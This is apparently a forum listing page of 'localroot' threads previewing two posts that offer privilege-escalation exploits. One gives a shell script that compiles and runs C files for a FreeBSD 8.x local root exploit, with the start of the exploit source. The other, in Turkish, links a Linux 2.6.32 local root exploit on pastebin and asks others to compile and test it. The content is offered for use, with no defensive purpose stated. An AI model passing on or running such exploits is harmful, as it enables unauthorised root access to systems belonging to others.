localroot

  1. Virtualw0rm

    Unix FreeBSD 8.x locaroot

    Unix FreeBSD 8.x locaroot start.sh; #!/bin/sh gcc free.c -o free gcc newsock.c -o new ./free && ./new exploit; #include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <sys/types.h> #include <unistd.h> #include <fcntl.h> int nullfd; int...
  2. Karaeski

    2.6.32 [x86_64] Local Root Exploit

    2014 server'ları geçtiğini okudum fakat denemedim. Eğer derleyip deneyen arkadaş olursa buraya yazsın. http://pastebin.com/ChuW0XQ2
Top